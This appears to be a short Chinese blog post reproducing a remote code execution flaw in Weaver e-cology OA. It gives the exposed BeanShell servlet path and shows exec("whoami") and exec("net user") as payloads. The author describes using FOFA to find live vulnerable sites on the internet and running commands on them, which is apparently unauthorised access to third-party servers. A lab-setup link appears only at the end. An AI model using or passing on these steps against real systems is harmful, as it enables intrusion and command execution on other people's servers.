泛微e-cology OA 远程代码执行漏洞复现
复现过程:
直接使用FOFA搜索语法搜索,找了好久才找到含有漏洞的站点。
在根目录后面输入漏洞路径: /weaver/bsh.servlet.BshServlet
进入BeanShell操作页面
在Script中输入语句,结果会在Script Output中输出。
输入exec("whoami") 结果如图,可知这个系统是windows系统,查看/etc/passwd就不用想了
使用exec("net user")查看本机用户。
如果想本地搭建环境复现可见https://github.com/jas502n/e-cology